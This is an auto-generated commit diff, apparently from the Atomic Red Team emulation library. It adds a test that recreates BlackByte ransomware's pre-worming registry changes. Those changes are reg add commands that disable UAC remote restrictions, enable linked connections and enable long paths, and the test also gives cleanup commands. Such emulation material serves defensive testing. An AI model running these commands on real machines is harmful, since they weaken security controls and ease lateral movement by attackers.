Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci]

atomics/Indexes/Indexes-CSV/index.csv

@@ -471,6 +471,7 @@ defense-evasion,T1112,Modify Registry,3,Modify registry to store logon credentia
 defense-evasion,T1112,Modify Registry,4,Add domain to Trusted sites Zone,cf447677-5a4e-4937-a82c-e47d254afd57,powershell
 defense-evasion,T1112,Modify Registry,5,Javascript in registry,15f44ea9-4571-4837-be9e-802431a7bfae,powershell
 defense-evasion,T1112,Modify Registry,6,Change Powershell Execution Policy to Bypass,f3a6cceb-06c9-48e5-8df8-8867a6814245,powershell
+defense-evasion,T1112,Modify Registry,7,BlackByte Ransomware Registry Changes - CMD,4f4e2f9f-6209-4fcf-9b15-3b7455706f5b,command_prompt
 defense-evasion,T1218.005,Mshta,1,Mshta executes JavaScript Scheme Fetch Remote Payload With GetObject,1483fab9-4f52-4217-a9ce-daa9d7747cae,command_prompt
 defense-evasion,T1218.005,Mshta,2,Mshta executes VBScript to execute malicious command,906865c3-e05f-4acc-85c4-fbc185455095,command_prompt
 defense-evasion,T1218.005,Mshta,3,Mshta Executes Remote HTML Application (HTA),c4b97eeb-5249-4455-a607-59f95485cb45,powershell

atomics/Indexes/Indexes-CSV/windows-index.csv

@@ -303,6 +303,7 @@ defense-evasion,T1112,Modify Registry,3,Modify registry to store logon credentia
 defense-evasion,T1112,Modify Registry,4,Add domain to Trusted sites Zone,cf447677-5a4e-4937-a82c-e47d254afd57,powershell
 defense-evasion,T1112,Modify Registry,5,Javascript in registry,15f44ea9-4571-4837-be9e-802431a7bfae,powershell
 defense-evasion,T1112,Modify Registry,6,Change Powershell Execution Policy to Bypass,f3a6cceb-06c9-48e5-8df8-8867a6814245,powershell
+defense-evasion,T1112,Modify Registry,7,BlackByte Ransomware Registry Changes - CMD,4f4e2f9f-6209-4fcf-9b15-3b7455706f5b,command_prompt
 defense-evasion,T1218.005,Mshta,1,Mshta executes JavaScript Scheme Fetch Remote Payload With GetObject,1483fab9-4f52-4217-a9ce-daa9d7747cae,command_prompt
 defense-evasion,T1218.005,Mshta,2,Mshta executes VBScript to execute malicious command,906865c3-e05f-4acc-85c4-fbc185455095,command_prompt
 defense-evasion,T1218.005,Mshta,3,Mshta Executes Remote HTML Application (HTA),c4b97eeb-5249-4455-a607-59f95485cb45,powershell

atomics/Indexes/Indexes-Markdown/index.md

@@ -746,6 +746,7 @@
   - Atomic Test #4: Add domain to Trusted sites Zone [windows]
   - Atomic Test #5: Javascript in registry [windows]
   - Atomic Test #6: Change Powershell Execution Policy to Bypass [windows]
+  - Atomic Test #7: BlackByte Ransomware Registry Changes - CMD [windows]
 - T1601 Modify System Image [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1218.005 Mshta](../../T1218.005/T1218.005.md)
   - Atomic Test #1: Mshta executes JavaScript Scheme Fetch Remote Payload With GetObject [windows]

atomics/Indexes/Indexes-Markdown/windows-index.md

@@ -515,6 +515,7 @@
   - Atomic Test #4: Add domain to Trusted sites Zone [windows]
   - Atomic Test #5: Javascript in registry [windows]
   - Atomic Test #6: Change Powershell Execution Policy to Bypass [windows]
+  - Atomic Test #7: BlackByte Ransomware Registry Changes - CMD [windows]
 - [T1218.005 Mshta](../../T1218.005/T1218.005.md)
   - Atomic Test #1: Mshta executes JavaScript Scheme Fetch Remote Payload With GetObject [windows]
   - Atomic Test #2: Mshta executes VBScript to execute malicious command [windows]

atomics/Indexes/index.yaml

@@ -31515,6 +31515,30 @@ defense-evasion:
 
 '
         name: powershell
+    - name: BlackByte Ransomware Registry Changes - CMD
+      auto_generated_guid: 4f4e2f9f-6209-4fcf-9b15-3b7455706f5b
+      description: |
+        This task recreates the steps taken by BlackByte ransomware before it worms to other machines.  See "Preparing to Worm" section: https://redcanary.com/blog/blackbyte-ransomware/
+        The steps are as follows:
+        <ol>
+            <li>1. Elevate Local Privilege by disabling UAC Remote Restrictions</li>
+            <li>2. Enable OS to share network connections between different privilege levels</li>
+            <li>3. Enable long path values for file paths, names, and namespaces to ensure encryption of all file names and paths</li>
+        </ol>
+        The registry keys and their respective values will be created upon successful execution.
+      supported_platforms:
+      - windows
+      executor:
+        command: |
+          cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f
+          cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLinkedConnections /t REG_DWORD /d 1 /f
+          cmd.exe /c reg add HKLM\SYSTEM\CurrentControlSet\Control\FileSystem /v LongPathsEnabled /t REG_DWORD /d 1 /f
+        cleanup_command: |
+          reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ /v LocalAccountTokenFilterPolicy /f 2>&1
+          reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ /v EnableLinkedConnections /f 2>&1
+          reg delete HKLM\SYSTEM\CurrentControlSet\Control\FileSystem\ /v LongPathsEnabled /f 2>&1
+        name: command_prompt
+        elevation_required: true
   T1601:
     technique:
       external_references:

atomics/T1112/T1112.md

@@ -22,6 +22,8 @@ The Registry of a remote system may be modified to aid in execution of files as
 
 - [Atomic Test #6 - Change Powershell Execution Policy to Bypass](#atomic-test-6---change-powershell-execution-policy-to-bypass)
 
+- [Atomic Test #7 - BlackByte Ransomware Registry Changes - CMD](#atomic-test-7---blackbyte-ransomware-registry-changes---cmd)
+
 
 <br/>
 
@@ -246,4 +248,47 @@ try { Set-ExecutionPolicy -ExecutionPolicy #{default_execution_policy} -Scope Lo
 
 
 
+<br/>
+<br/>
+
+## Atomic Test #7 - BlackByte Ransomware Registry Changes - CMD
+This task recreates the steps taken by BlackByte ransomware before it worms to other machines.  See "Preparing to Worm" section: https://redcanary.com/blog/blackbyte-ransomware/
+The steps are as follows:
+<ol>
+    <li>1. Elevate Local Privilege by disabling UAC Remote Restrictions</li>
+    <li>2. Enable OS to share network connections between different privilege levels</li>
+    <li>3. Enable long path values for file paths, names, and namespaces to ensure encryption of all file names and paths</li>
+</ol>
+The registry keys and their respective values will be created upon successful execution.
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 4f4e2f9f-6209-4fcf-9b15-3b7455706f5b
+
+
+
+
+
+
+#### Attack Commands: Run with `command_prompt`!  Elevation Required (e.g. root or admin) 
+
+
+```cmd
+cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f
+cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLinkedConnections /t REG_DWORD /d 1 /f
+cmd.exe /c reg add HKLM\SYSTEM\CurrentControlSet\Control\FileSystem /v LongPathsEnabled /t REG_DWORD /d 1 /f
+```
+
+#### Cleanup Commands:
+```cmd
+reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ /v LocalAccountTokenFilterPolicy /f 2>&1
+reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ /v EnableLinkedConnections /f 2>&1
+reg delete HKLM\SYSTEM\CurrentControlSet\Control\FileSystem\ /v LongPathsEnabled /f 2>&1
+```
+
+
+
+
+
 <br/>